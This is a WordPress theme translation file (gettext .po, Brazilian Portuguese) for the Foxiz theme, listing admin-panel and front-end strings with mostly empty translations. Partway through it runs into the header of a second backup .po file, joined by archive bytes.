backend/panels/optimized.php:82 msgid "" "The theme will load default fonts to render some elements as heading tags, " "body, meta." msgstr "" #: backend/panels/blog-pages.php:343 backend/panels/blog-pages.php:830 #: backend/panels/blog-pages.php:1244 backend/panels/blog-pages.php:1652 #: backend/panels/blog-pages.php:2144 backend/panels/bookmark.php:244 #: backend/panels/bookmark.php:692 msgid "" "The theme will use \"Standard Blog Design\" settings to render block. You " "can override settings in the panel below." msgstr "" #: backend/single-metaboxes.php:886 msgid "" "The transparent headers is only suitable for layouts: Standard 2, Standard 5," " Video 2 and Audio 2." msgstr "" #: backend/panels/single-post.php:1558 msgid "" "The transparent headers is only suitable with layouts: Standard 2, Video 2 " "and Audio 2." msgstr "" #: backend/single-metaboxes.php:109 msgid "" "The transparent headers is only suitable with the page has a sliders or wide " "image at the top." msgstr "" #: backend/panels/design.php:16 msgid "Theme Design" msgstr "" #: backend/theme-options.php:240 backend/theme-options.php:241 msgid "Theme Options" msgstr "" #: backend/class-tgm-plugin-activation.php:408 msgid "" "There are one or more required or recommended plugins to install, update or " "activate." msgstr "" #: backend/class-tgm-plugin-activation.php:366 #, php-format msgid "There is an update available for: %1$s." msgstr "" #: backend/panels/blog-pages.php:19 msgid "" "These are global category settings. The settings below will apply to all " "category pages." msgstr "" #: backend/panels/block-grid.php:515 msgid "" "These are settings for the boxed grid 1. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-grid.php:702 msgid "" "These are settings for the boxed grid 2. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-list.php:366 msgid "" "These are settings for the boxed list 1. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-list.php:561 msgid "" "These are settings for the boxed list 2. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-classic.php:20 msgid "" "These are settings for the Classic (standard) layout. It will be overridden " "by the \"Block Design\" (for Elementor pages) and \"Blog Design\" (for the " "Blog and Archive pages)." msgstr "" #: backend/panels/block-grid.php:20 msgid "" "These are settings for the Grid 1 (standard). It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-grid.php:185 msgid "" "These are settings for the grid 2 layout. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-list.php:20 msgid "" "These are settings for the list 1 (standard) layout. It will be overridden " "by the \"Block Design\" (for Elementor pages) and \"Blog Design\" (for the " "Blog and Archive pages)." msgstr "" #: backend/panels/block-list.php:193 msgid "" "These are settings for the list 2. It will be overridden by the \"Block " "Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and Archive " "pages)." msgstr "" #: backend/panels/block-grid.php:350 msgid "" "These are settings for the small grid layout. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)" msgstr "" #: backend/panels/design.php:90 msgid "" "These are small elements that display in the post listing ie: author name, " "date, total views, total comments..." msgstr "" #: backend/panels/breadcrumb.php:24 msgid "" "These settings below require to activate Navxt plugin Yoast SEO and Rank " "Math SEO breadcrumbs in order to work." msgstr "" #: bookmark/bookmark.php:174 msgid "This article has been added to reading list" msgstr "" #: bookmark/bookmark.php:190 msgid "This article was removed from reading list" msgstr "" #: bookmark/bookmark.php:209 msgid "This article was removed from your bookmark" msgstr "" #: templates/parts.php:116 #, php-format msgid "" "This block requests at least %s posts, Please add new posts for this query " "or change the block settings: " msgstr "" #: backend/panels/optimized.php:254 msgid "" "This image is used if the post/page being shared does not contain featured " "images." msgstr "" #: backend/panels/single-post.php:1233 msgid "This is a global option to disable all comments on posts & page..." msgstr "" #: backend/panels/sidebar.php:28 msgid "" "This is the global option and will be overridden by individual \"Sidebar " "Position\" settings." msgstr "" #: backend/single-metaboxes.php:284 msgid "" "This option is useful in case you would like to create a custom entry meta." msgstr "" #: backend/panels/newsletter.php:105 msgid "" "This option use for \"Scroll Distance\" mode. Input a distance value (px) " "when visitor scrolling down to show the popup." msgstr "" #: backend/panels/newsletter.php:112 msgid "" "This option use for \"Time Delay\" mode. Input a delay time (ms) value to " "show the popup after the site loaded." msgstr "" #: backend/panels/design.php:329 msgid "" "This option will help you optimize the site speed or increase image quality " "on your website." msgstr "" #: backend/class-tgm-plugin-activation.php:615 msgid "This plugin needs to be updated to be compatible with your theme." msgstr "" #: backend/panels/ads.php:86 msgid "" "This section supports ads in the top header website. For other ad spots, " "please read the theme documentation for further info." msgstr "" #: backend/panels/ads.php:274 msgid "" "This section supports ads inside single post content, after x paragraphs. " "For other ad spots, please read the theme documentation for further info." msgstr "" #: backend/panels/header.php:639 msgid "" "This section will show a small alert or event at the bottom of the " "navigation." msgstr "" #: backend/panels/header.php:264 msgid "This section will show the user bookmark list and latest blog listing." msgstr "" #: backend/panels/header.php:620 msgid "This setting apply to the logout button in the logged user dropdown." msgstr "" #: backend/panels/header.php:61 msgid "" "This setting requires to set \"Use Ruby Template\" in the setting above in " "order to work." msgstr "" #: backend/panels/color.php:125 backend/panels/color.php:142 msgid "This setting will apply to the default mode." msgstr "" #: backend/panels/blog-pages.php:155 msgid "" "This setting will be overridden by \"Global WP Query Template Shortcode\" in " "the individual category setting panel." msgstr "" #: backend/panels/blog-pages.php:121 msgid "" "This setting will be overridden by \"template shortcode\" in the individual " "category setting panel." msgstr "" #: backend/panels/table-contents.php:150 msgid "This setting will not apply to the full width 2 columns layout." msgstr "" #: backend/panels/single-post.php:499 msgid "" "This setting will only apply on the desktop devices. Navigate to " "\"Typography > Entry Category\" to set for tablet mobile devices." msgstr "" #: backend/panels/blog-pages.php:179 backend/panels/blog-pages.php:715 #: backend/panels/blog-pages.php:1130 msgid "" "This setting will override on \"Dashboard > Settings > Reading > Blog pages " "show at most\" setting. It also apply to the \"Global WP Query Template " "Shortcode\"." msgstr "" #: backend/mega-menu.php:198 msgid "This setting will override on above settings." msgstr "" #: backend/panels/blog-pages.php:62 backend/panels/blog-pages.php:628 #: backend/panels/blog-pages.php:1946 msgid "" "This setting will override on the \"Header Style\" setting, Leave it blank " "if you would like to use the \"Header Style\" setting." msgstr "" #: backend/panels/blog-pages.php:47 backend/panels/blog-pages.php:613 #: backend/panels/blog-pages.php:1931 msgid "" "This setting will override on the setting in the header panel. It will not " "apply to the header style 4." msgstr "" #: backend/class-tgm-plugin-activation.php:354 #, php-format msgid "This theme recommends the following plugin: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:348 #, php-format msgid "This theme requires the following plugin: %1$s." msgstr "" #: backend/panels/newsletter.php:97 msgid "Time Delay" msgstr "" #: backend/panels/adblock.php:26 backend/panels/newsletter.php:34 msgid "Title" msgstr "" #: backend/category-settings.php:433 backend/panels/block-classic.php:120 #: backend/panels/block-grid.php:120 backend/panels/block-grid.php:285 #: backend/panels/block-grid.php:450 backend/panels/block-grid.php:623 #: backend/panels/block-grid.php:810 backend/panels/block-list.php:128 #: backend/panels/block-list.php:301 backend/panels/block-list.php:482 #: backend/panels/block-list.php:677 backend/panels/blog-pages.php:460 #: backend/panels/blog-pages.php:947 backend/panels/blog-pages.php:1361 #: backend/panels/blog-pages.php:1769 backend/panels/blog-pages.php:2261 #: backend/panels/bookmark.php:359 backend/panels/bookmark.php:807 msgid "Title HTML Tag" msgstr "" #: backend/class-tgm-plugin-activation.php:2494 #, php-format msgid "To Activate (%s)" msgstr "" #: backend/panels/header.php:121 msgid "" "To add column widgets, navigate to \"Dashboard > Appearance > Widgets > More " "Menu Section\". Please read the documentation for further information." msgstr "" #: backend/panels/footer.php:92 msgid "To add content, please navigate to Appearance > Widgets." msgstr "" #: backend/panels/logo.php:39 msgid "" "To add the favicon, navigate to \"Appearance > Customize > Site Identity > " "Site Icon\". Please read the documentation for further information." msgstr "" #: backend/panels/design.php:40 msgid "" "To edit color for individual category, navigate to \"Admin Dashboard > Posts " "> Categories > Edit\"." msgstr "" #: backend/panels/blog-pages.php:25 msgid "" "To edit for individual category, navigate to \"Admin Dashboard > Posts > " "Categories > Edit\"." msgstr "" #: backend/panels/single-post.php:1550 msgid "" "To edit for individual post, navigate to \"Posts > Edit > Post Options > " "Site Header\"." msgstr "" #: backend/panels/heading.php:29 msgid "" "To edit the heading typography, navigate to \"Typography > Block Heading\"." msgstr "" #: backend/panels/header.php:182 msgid "" "To edit the placeholder text of the search form, navigate to \"Theme Options " "> General > Search Placeholder\"." msgstr "" #: backend/panels/single-post.php:524 msgid "" "To edit the tagline typography, navigate to \"Typography > Headline & " "Tagline > Single Tagline\"." msgstr "" #: backend/panels/header.php:315 msgid "" "To edit the typography, navigate to \"Typography > Menu > Mobile Menu " "Settings\". Navigate to \"Social Profiles\" for the social list." msgstr "" #: backend/panels/sidebar.php:21 msgid "" "To edit the widget heading layout, navigate to \"Heading Design > Sidebar " "Widget Heading\"." msgstr "" #: backend/class-tgm-plugin-activation.php:2486 #, php-format msgid "To Install (%s)" msgstr "" #: backend/panels/amp.php:132 msgid "" "To setup the copyright area, Please navigate to Footer > Copyright Section." msgstr "" #: backend/panels/single-post.php:1260 msgid "" "To use the shortcode, read the documentation \"Related Box Shortcode\" for " "further information." msgstr "" #: backend/panels/header.php:203 msgid "Toggle Mode" msgstr "" #: backend/panels/general.php:17 msgid "Tooltips" msgstr "" #: backend/configs.php:376 msgid "Top" msgstr "" #: backend/panels/blog-pages.php:643 msgid "Top & Bottom Area Template Builder" msgstr "" #: backend/panels/header-style.php:618 msgid "Top & Bottom Border" msgstr "" #: backend/configs.php:377 msgid "Top (Big Icon)" msgstr "" #: backend/panels/amp.php:420 msgid "Top - Ad Type" msgstr "" #: backend/panels/amp.php:448 msgid "Top - Adsense Size" msgstr "" #: backend/panels/amp.php:460 msgid "Top - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:432 msgid "Top - Data Ad Client" msgstr "" #: backend/panels/amp.php:440 msgid "Top - Data Ad Slot" msgstr "" #: backend/category-settings.php:129 backend/panels/blog-pages.php:649 msgid "Top Area Template Shortcode" msgstr "" #: backend/panels/footer.php:53 msgid "Top Border" msgstr "" #: backend/single-metaboxes.php:681 msgid "Top Entry Widgets Area" msgstr "" #: includes/menu.php:302 msgid "Top News" msgstr "" #: backend/panels/single-post.php:706 msgid "Top Share Bar" msgstr "" #: backend/panels/amp.php:414 msgid "Top Single Content Ad Settings" msgstr "" #: backend/panels/ads.php:77 backend/panels/privacy.php:25 msgid "Top Site" msgstr "" #: backend/single-metaboxes.php:142 backend/single-metaboxes.php:919 msgid "Top Site Advert" msgstr "" #: backend/category-settings.php:124 backend/panels/blog-pages.php:114 msgid "Top Template Builder" msgstr "" #: backend/panels/woocommerce.php:147 msgid "Total Related Products" msgstr "" #: backend/configs.php:80 msgid "Transparent - Style 1" msgstr "" #: backend/configs.php:81 msgid "Transparent - Style 2" msgstr "" #: backend/configs.php:82 msgid "Transparent - Style 3" msgstr "" #: backend/panels/header-style.php:262 msgid "Transparent Colors" msgstr "" #: backend/panels/logo.php:125 msgid "Transparent Logo" msgstr "" #: backend/panels/logo.php:115 msgid "Transparent Logos" msgstr "" #: backend/panels/logo.php:133 msgid "Transparent Retina Logo" msgstr "" #: backend/panels/header.php:547 msgid "Trigger Button Layout" msgstr "" #: backend/panels/single-post.php:768 backend/panels/single-post.php:907 #: backend/panels/single-post.php:1045 backend/panels/single-post.php:1673 #: templates/parts.php:609 msgid "Tumblr" msgstr "" #: backend/panels/socials.php:68 msgid "Tumblr URL " msgstr "" #: backend/panels/single-post.php:732 backend/panels/single-post.php:871 #: backend/panels/single-post.php:1009 backend/panels/single-post.php:1641 #: templates/parts.php:594 msgid "Twitter" msgstr "" #: backend/panels/socials.php:35 msgid "Twitter URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2643 msgid "Type" msgstr "" #: backend/panels/typography.php:13 msgid "Typography" msgstr "" #: backend/panels/single-post.php:245 msgid "Underline Color" msgstr "" #: bookmark/bookmark.php:57 msgid "Undo" msgstr "" #: templates/parts.php:803 msgid "Unfollow" msgstr "" #: backend/class-tgm-plugin-activation.php:2576 msgid "unknown" msgstr "" #: backend/panels/sidebar.php:37 msgid "Unlimited Sidebars" msgstr "" #: backend/class-tgm-plugin-activation.php:2817 msgid "Update" msgstr "" #: backend/configs.php:408 backend/panels/design.php:274 msgid "update (Last Updated)" msgstr "atualização (última atualização)" #: backend/class-tgm-plugin-activation.php:2702 #, php-format msgid "Update %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:2490 #, php-format msgid "Update Available (%s)" msgstr "" #: backend/class-tgm-plugin-activation.php:2427 msgid "Update recommended" msgstr "" #: backend/class-tgm-plugin-activation.php:616 msgid "Update Required" msgstr "" #: templates/single/templates.php:456 msgid "Updated" msgstr "Atualizado" #: backend/panels/design.php:117 msgid "Updated Date Icon" msgstr "" #: backend/class-tgm-plugin-activation.php:3592 #, php-format msgid "Updating Plugin %1$s (%2$d/%3$d)" msgstr "" #: backend/class-tgm-plugin-activation.php:344 #, php-format msgid "Updating Plugin: %s" msgstr "" #: backend/class-tgm-plugin-activation.php:2778 msgid "Upgrade message from the plugin author:" msgstr "" #: backend/single-metaboxes.php:535 msgid "Upload a background header image for this review section." msgstr "" #: backend/panels/blog-pages.php:1983 msgid "Upload a background image for the search header in the dark mode." msgstr "" #: backend/panels/blog-pages.php:1969 msgid "Upload a background image for the search header." msgstr "" #: backend/panels/blog-pages.php:2399 msgid "Upload a header image for the 404 page in the dark mode." msgstr "" #: backend/panels/blog-pages.php:2391 msgid "Upload a header image for the 404 page." msgstr "" #: backend/panels/bookmark.php:129 backend/panels/bookmark.php:472 msgid "Upload a image for displaying at the top heading in the dark mode." msgstr "" #: backend/panels/bookmark.php:121 backend/panels/bookmark.php:464 msgid "Upload a image for displaying at the top heading. Image height is 60px." msgstr "" #: backend/panels/logo.php:126 msgid "" "Upload a light logo for transparent headers. Recommended logo height value " "is 60px, allowed extensions are .jpg, .png and .gif." msgstr "" #: backend/panels/logo.php:104 msgid "" "Upload a light retina logo for displaying in mobile device. It should be " "same dimensions with the mobile logo." msgstr "" #: backend/panels/logo.php:134 msgid "" "Upload a light retina logo for transparent headers. Recommended logo height " "value is 120px." msgstr "" #: backend/panels/logo.php:96 msgid "" "Upload a logo for the mobile device. Recommended logo height value is 84px, " "allowed extensions are .jpg, .png and .gif" msgstr "" #: backend/panels/footer.php:153 msgid "" "Upload a small dark logo to display at bottom of the footer in the dark mode." msgstr "" #: backend/panels/footer.php:145 msgid "Upload a small logo to display at bottom of the footer." msgstr "" #: backend/panels/amp.php:92 msgid "Upload AMP footer logo." msgstr "" #: backend/category-settings.php:87 msgid "Upload featured images (maximum: 2 images) for this category." msgstr "" #: backend/single-metaboxes.php:433 msgid "Upload Gallery" msgstr "" #: backend/panels/logo.php:160 msgid "" "Upload icon for the Apple touch (72 x 72px), allowed extensions are .jpg, ." "png, .gif" msgstr "" #: backend/panels/logo.php:168 msgid "" "Upload icon for the Metro interface (144 x 144px), allowed extensions are ." "jpg, .png, .gif" msgstr "" #: backend/single-metaboxes.php:643 msgid "" "Upload the sponsor light logo for this post, recommended height for the logo " "is 52px." msgstr "" #: backend/single-metaboxes.php:637 msgid "" "Upload the sponsor logo for this post, recommended height for the logo is " "52px." msgstr "" #: backend/panels/ads.php:187 backend/panels/ads.php:376 msgid "Upload your ad image in the dark mode." msgstr "" #: backend/panels/ads.php:180 backend/panels/ads.php:369 msgid "Upload your ad image." msgstr "" #: backend/single-metaboxes.php:399 msgid "Upload your audio file, support: mp3, ogg, wma, m4a, wav files." msgstr "" #: backend/panels/login.php:67 msgid "Upload your background for the logo screen." msgstr "" #: backend/single-metaboxes.php:434 msgid "Upload your images for this gallery." msgstr "" #: backend/panels/login.php:52 msgid "" "Upload your logo for the logo screen. This option will override on wordpress " "logo." msgstr "" #: backend/single-metaboxes.php:339 msgid "" "Upload your preview video. Keep video short and lightweight as possible to " "save server bandwidth." msgstr "" #: backend/single-metaboxes.php:351 msgid "Upload your video file, support: mp4, m4v, webm, ogv, wmv, flv files." msgstr "" #: backend/panels/ads.php:124 backend/panels/ads.php:313 msgid "Use Adsense units code to ensure it display exactly where you put." msgstr "" #: backend/configs.php:359 msgid "Use Custom" msgstr "" #: backend/category-settings.php:105 backend/panels/blog-pages.php:1225 #: backend/panels/breadcrumb.php:54 backend/panels/breadcrumb.php:65 #: backend/panels/breadcrumb.php:76 backend/panels/breadcrumb.php:87 #: backend/panels/breadcrumb.php:98 backend/panels/page.php:85 #: backend/panels/single-post.php:452 msgid "Use Global Setting" msgstr "" #: backend/configs.php:223 msgid "Use Post Excerpt" msgstr "" #: backend/configs.php:86 backend/panels/footer.php:98 msgid "Use Ruby Template" msgstr "" #: backend/panels/header-style.php:114 backend/panels/header-style.php:402 #: backend/panels/header-style.php:439 backend/panels/header-style.php:669 #: backend/panels/header.php:410 msgid "use the option \"To\" to set a gradient background." msgstr "" #: backend/configs.php:224 msgid "Use Title Tagline" msgstr "" #: backend/panels/sidebar.php:49 msgid "" "Useful when a sidebar is too tall or too short compared to the rest of the " "content." msgstr "" #: backend/panels/header.php:609 msgid "User Dashboard Menu" msgstr "" #: backend/panels/bookmark.php:438 msgid "User Interests" msgstr "" #: backend/panels/single-post.php:1175 backend/panels/single-post.php:1219 #: backend/single-metaboxes.php:483 msgid "User Rating in Comments" msgstr "" #: backend/panels/reaction.php:16 backend/single-metaboxes.php:839 msgid "User Reaction" msgstr "" #: templates/single/reviews.php:242 msgid "User Votes" msgstr "" #: backend/class-tgm-plugin-activation.php:2647 msgid "Version" msgstr "" #: backend/configs.php:849 msgid "Vertical Banner (120 x 240)" msgstr "" #: templates/single/review-comment.php:94 msgid "Very Poor" msgstr "" #: backend/panels/single-post.php:312 msgid "Via Bar" msgstr "" #: backend/single-metaboxes.php:799 msgid "Via Name" msgstr "" #: backend/single-metaboxes.php:804 msgid "Via URL" msgstr "" #: templates/single/templates.php:701 msgid "VIA:" msgstr "Via:" #: backend/single-metaboxes.php:316 msgid "Video Format" msgstr "" #: backend/panels/design.php:477 msgid "Video Icon" msgstr "" #: backend/panels/design.php:498 msgid "Video Icon Color" msgstr "" #: backend/single-metaboxes.php:322 msgid "Video Layout" msgstr "" #: backend/panels/single-post.php:60 msgid "Video Post Format Layout" msgstr "" #: backend/panels/single-post.php:66 msgid "Video Post Layout" msgstr "" #: backend/single-metaboxes.php:331 msgid "Video URL" msgstr "" #: backend/configs.php:406 backend/panels/design.php:272 msgid "view (Post Views)" msgstr "" #: templates/header/templates.php:905 msgid "View Cart" msgstr "" #: templates/parts.php:636 msgid "Vimeo" msgstr "" #: backend/panels/socials.php:122 msgid "Vimeo URL " msgstr "" #: backend/panels/single-post.php:786 backend/panels/single-post.php:925 #: backend/panels/single-post.php:1063 backend/panels/single-post.php:1689 #: templates/parts.php:642 msgid "Vkontakte" msgstr "" #: backend/panels/socials.php:134 msgid "VKontakte URL " msgstr "" #: templates/single/reviews.php:245 msgid "vote" msgstr "" #: templates/single/reviews.php:247 msgid "votes" msgstr "" #: backend/panels/general.php:56 msgid "" "We recommend you should create a backup before updating or major changes." msgstr "" #: backend/panels/optimized.php:21 #, php-format msgid "" "We recommend you to refer this " "DOCUMENTATION to optimize for you website" msgstr "" #: templates/parts.php:588 msgid "Website" msgstr "" #: backend/panels/typography.php:27 msgid "Website Body" msgstr "" #: backend/panels/header.php:560 msgid "Welcome Back!" msgstr "" #: templates/single/templates.php:753 msgid "What do you think?" msgstr "O que você acha?" #: backend/panels/single-post.php:1348 msgid "What posts should be displayed in the related section." msgstr "" #: backend/panels/single-post.php:750 backend/panels/single-post.php:889 #: backend/panels/single-post.php:1027 backend/panels/single-post.php:1657 #: templates/parts.php:648 msgid "WhatsApp" msgstr "" #: backend/panels/socials.php:146 msgid "Whatsapp URL " msgstr "" #: backend/category-settings.php:418 backend/panels/block-classic.php:99 #: backend/panels/block-grid.php:99 backend/panels/block-grid.php:264 #: backend/panels/block-grid.php:429 backend/panels/block-grid.php:602 #: backend/panels/block-grid.php:789 backend/panels/block-list.php:107 #: backend/panels/block-list.php:280 backend/panels/block-list.php:461 #: backend/panels/block-list.php:656 backend/panels/blog-pages.php:444 #: backend/panels/blog-pages.php:931 backend/panels/blog-pages.php:1345 #: backend/panels/blog-pages.php:1753 backend/panels/blog-pages.php:2245 #: backend/panels/bookmark.php:343 backend/panels/bookmark.php:791 msgid "" "When you select \"use title tagline\". if it is empty, it will fallback to " "the post excerpt or content." msgstr "" #: backend/category-settings.php:417 backend/panels/block-classic.php:98 #: backend/panels/block-grid.php:98 backend/panels/block-grid.php:263 #: backend/panels/block-grid.php:428 backend/panels/block-grid.php:601 #: backend/panels/block-grid.php:788 backend/panels/block-list.php:106 #: backend/panels/block-list.php:279 backend/panels/block-list.php:460 #: backend/panels/block-list.php:655 backend/panels/blog-pages.php:443 #: backend/panels/blog-pages.php:930 backend/panels/blog-pages.php:1344 #: backend/panels/blog-pages.php:1752 backend/panels/blog-pages.php:2244 #: backend/panels/bookmark.php:342 backend/panels/bookmark.php:790 msgid "Where to get the post excerpt." msgstr "" #: backend/configs.php:847 msgid "Wide Skyscraper (160x600)" msgstr "" #: backend/panels/sidebar.php:55 msgid "Widget Block Editor" msgstr "" #: backend/panels/heading.php:112 msgid "Widget Heading HTML Tag" msgstr "" #: backend/panels/heading.php:95 msgid "Widget Heading Layout" msgstr "" #: backend/panels/footer.php:113 msgid "Widget Menu Font Size" msgstr "" #: backend/panels/single-post.php:165 msgid "Width Settings" msgstr "" #: backend/panels/reaction.php:48 msgid "Wink" msgstr "" #: backend/panels/woocommerce.php:28 msgid "WooCommerce" msgstr "" #: backend/panels/woocommerce.php:44 msgid "WooCommerce Pages" msgstr "" #: backend/panels/woocommerce.php:15 msgid "" "Woocommerce plugin not found! Please install and active Woocommerce to active settings " "below." msgstr "" #: backend/class-tgm-plugin-activation.php:2386 msgid "WordPress Repository" msgstr "" #: backend/panels/design.php:354 msgid "" "WordPress will crop uploaded images to ensure your website use the best " "image size for the blog layouts." msgstr "" #: backend/panels/design.php:165 msgid "Words per Minute" msgstr "" #: backend/panels/header-style.php:60 backend/panels/header-style.php:354 #: backend/panels/header-style.php:606 msgid "Wrapper (1240px)" msgstr "" #: backend/panels/optimized.php:91 msgid "Write CSS to file to reduce CPU usage and reduce the load time." msgstr "" #: backend/panels/heading.php:23 msgid "" "You can also choose layouts and colors for individual heading the page " "builder." msgstr "" #: backend/panels/typography.php:84 msgid "" "You can control the excerpt font sizes in this panel. The font family and " "other font values will base on \"Body Font\" values." msgstr "" #: backend/panels/dark-mode.php:24 msgid "" "You can set custom dark mode background in \"Global Colors > Dark Mode " "Background\"." msgstr "" #: bookmark/templates.php:60 msgid "You haven't saved anything yet." msgstr "" #: templates/single/footer.php:50 msgid "You Might Also Like" msgstr "Você pode gostar também" #: backend/panels/bookmark.php:113 msgid "you'll find all saved articles here." msgstr "" #: templates/ajax.php:128 msgid "You've reached the end of the list!" msgstr "" #: backend/panels/bookmark.php:449 msgid "Your Categories" msgstr "" #: templates/single/review-comment.php:97 msgid "Your comment" msgstr "" #: templates/single/review-comment.php:63 msgid "Your Email" msgstr "Seu email" #: includes/actions.php:47 msgid "Your email" msgstr "Seu email" #: includes/actions.php:44 templates/single/review-comment.php:57 msgid "Your name" msgstr "Seu nome" #: templates/single/review-comment.php:87 msgid "Your Rating" msgstr "" #: templates/single/templates.php:942 msgid "Your review is awaiting moderation." msgstr "" #: templates/single/templates.php:944 msgid "" "Your review is awaiting moderation. This is a preview, your review will be " "visible after it has been approved." msgstr "" #: includes/actions.php:51 msgid "Your Website" msgstr "Seu site" #: templates/single/review-comment.php:69 msgid "Your website" msgstr "Seu site" #: templates/parts.php:597 msgid "YouTube" msgstr "" #: backend/panels/socials.php:42 msgid "Youtube URL " msgstr "" #: backend/panels/newsletter.php:57 msgid "Zero spam, Unsubscribe at any time." msgstr "" PK!&YY*languages/pt_BR-backup-202209020000370.po~nu[msgid "" msgstr "" "Project-Id-Version: Foxiz\n" "POT-Creation-Date: 2022-05-18 13:30+0700\n" "PO-Revision-Date: 2022-09-01 23:29+0000\n" "Last-Translator: \n" "Language-Team: Português do Brasil\n" "Language: pt_BR\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" "X-Generator: Loco https://localise.biz/\n" "X-Poedit-Basepath: ..\n" "Plural-Forms: nplurals=2; plural=n != 1;\n" "X-Poedit-SourceCharset: UTF-8\n" "X-Poedit-KeywordsList: _x;__;_e;_nx:1,2;esc_html__;esc_html_e;esc_attr__;" "esc_attr_e;foxiz_html__;foxiz_attr__;foxiz_html_e;foxiz_attr_e;_n;_nx;" "_n_noop\n" "X-Poedit-SearchPath-0: .\n" "X-Poedit-SearchPathExcluded-0: *.js\n" "Report-Msgid-Bugs-To: \n" "X-Loco-Version: 2.6.2; wp-6.0.2" #: templates/blog.php:498 msgid " Get started here" msgstr "" #: backend/panels/page.php:30 msgid " Page Header Style" msgstr "" #: backend/panels/footer.php:83 msgid "" "\"Column Border\" and \"Widget Menu Font Size\" and \"Text Color Scheme\" " "will not apply to Ruby template shortcode." msgstr "" #: backend/panels/design.php:103 backend/panels/single-post.php:592 msgid "\"Posted\" Author Label" msgstr "" #: backend/class-tgm-plugin-activation.php:3603 #, php-format msgid "%1$s installed and activated successfully." msgstr "" #: backend/class-tgm-plugin-activation.php:3611 #, php-format msgid "%1$s installed successfully." msgstr "" #: backend/class-tgm-plugin-activation.php:2436 #, php-format msgid "%1$s, %2$s" msgstr "" #: templates/entry.php:320 #, php-format msgid "%s ago" msgstr "" #: templates/single/templates.php:910 #, php-format msgid "%s Comments" msgstr "%s Comentários" #: templates/entry.php:557 #, php-format msgid "%s comments" msgstr "%s comentários" #: templates/entry.php:692 #, php-format msgid "%s Min Read" msgstr "" #: templates/single/reviews.php:54 #, php-format msgid "%s out of 10" msgstr "" #: templates/single/reviews.php:97 #, php-format msgid "%s out of 5" msgstr "" #: templates/single/templates.php:886 #, php-format msgid "%s Reviews" msgstr "" #: templates/entry.php:619 #, php-format msgid "%s Views" msgstr "" #: comments.php:25 msgid "← Older Comments" msgstr "" #: backend/single-metaboxes.php:753 msgid "+Add Heading" msgstr "" #: backend/single-metaboxes.php:208 msgid "+Add Highlight" msgstr "" #: backend/single-metaboxes.php:775 msgid "+Add Post Source" msgstr "" #: backend/single-metaboxes.php:796 msgid "+Add Post Via" msgstr "" #: backend/panels/ads.php:412 msgid "- Advertisement -" msgstr "" #: backend/panels/header.php:612 msgid "- Assign a Menu -" msgstr "" #: backend/category-settings.php:104 backend/category-settings.php:116 #: backend/category-settings.php:142 backend/category-settings.php:242 #: backend/category-settings.php:315 backend/category-settings.php:349 #: backend/category-settings.php:401 backend/configs.php:46 #: backend/configs.php:71 backend/configs.php:106 backend/configs.php:161 #: backend/configs.php:195 backend/configs.php:209 backend/configs.php:236 #: backend/configs.php:288 backend/configs.php:319 backend/configs.php:357 #: backend/configs.php:373 backend/configs.php:424 backend/configs.php:499 #: backend/configs.php:524 backend/configs.php:542 backend/configs.php:559 #: backend/configs.php:583 backend/configs.php:607 backend/configs.php:634 #: backend/configs.php:693 backend/configs.php:732 backend/configs.php:771 #: backend/configs.php:801 backend/configs.php:822 backend/mega-menu.php:139 #: backend/mega-menu.php:150 backend/panels/blog-pages.php:324 #: backend/panels/blog-pages.php:493 backend/panels/blog-pages.php:523 #: backend/panels/blog-pages.php:811 backend/panels/blog-pages.php:980 #: backend/panels/blog-pages.php:1010 backend/panels/blog-pages.php:1394 #: backend/panels/blog-pages.php:1424 backend/panels/blog-pages.php:1633 #: backend/panels/blog-pages.php:1802 backend/panels/blog-pages.php:1832 #: backend/panels/blog-pages.php:2125 backend/panels/blog-pages.php:2294 #: backend/panels/blog-pages.php:2324 backend/panels/bookmark.php:227 #: backend/panels/bookmark.php:392 backend/panels/bookmark.php:414 #: backend/panels/bookmark.php:675 backend/panels/bookmark.php:840 #: backend/panels/bookmark.php:870 backend/panels/design.php:578 #: backend/panels/design.php:595 backend/single-metaboxes.php:60 #: backend/single-metaboxes.php:73 backend/single-metaboxes.php:132 #: backend/single-metaboxes.php:223 backend/single-metaboxes.php:360 #: backend/single-metaboxes.php:408 backend/single-metaboxes.php:487 #: backend/single-metaboxes.php:507 backend/single-metaboxes.php:652 #: backend/single-metaboxes.php:714 backend/single-metaboxes.php:726 #: backend/single-metaboxes.php:824 backend/single-metaboxes.php:843 #: backend/single-metaboxes.php:862 backend/single-metaboxes.php:874 #: backend/single-metaboxes.php:909 msgid "- Default -" msgstr "" #: backend/configs.php:253 backend/mega-menu.php:168 #: backend/panels/bookmark.php:573 backend/panels/login.php:29 msgid "- Disable -" msgstr "" #: backend/panels/login.php:40 msgid "- Left -" msgstr "" #: backend/mega-menu.php:184 msgid "- Select Columns -" msgstr "" #: backend/panels/amp.php:303 backend/panels/amp.php:363 #: backend/panels/amp.php:423 backend/panels/amp.php:484 #: backend/panels/amp.php:544 msgid "-- Adsense --" msgstr "" #: backend/single-metaboxes.php:476 backend/single-metaboxes.php:615 msgid "-- Disable --" msgstr "" #: backend/panels/amp.php:331 backend/panels/amp.php:391 #: backend/panels/amp.php:451 backend/panels/amp.php:512 #: backend/panels/amp.php:572 msgid "-- Responsive --" msgstr "" #: backend/mega-menu.php:128 msgid "-Disable-" msgstr "" #: backend/configs.php:500 backend/mega-menu.php:47 msgid "1 